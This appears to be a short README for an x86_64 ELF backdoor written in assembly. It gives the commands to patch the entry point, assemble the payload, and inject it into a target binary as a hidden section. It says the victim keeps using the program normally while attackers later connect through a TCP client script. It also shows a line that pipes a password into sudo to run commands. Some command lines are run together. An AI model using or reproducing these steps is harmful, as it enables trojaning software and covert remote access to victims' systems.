It is elf backdoor written in pure assembly language that works in x86_64
First, in the backdoor/backdoor.s file,
you need to modify the statement push 0x4049a0 ; jump to entrypoint to the original entry point of the target binary.
$ gcc elfinject.c -o elfinject -lelf
$ nasm -f bin backdoor.s -o backdoor.bin
$ ./elfinject elftarget backdoor.bin ".injected" 0x800000 0$ python3 tcpClient.py
If the victim downloads or acquires the file in any manner.
$ ./elftarget
The victim successfully uses the original program without any issues, but later, attackers exploit backdoors.
$ python3 tcpClient
echo "password" | sudo -S <command>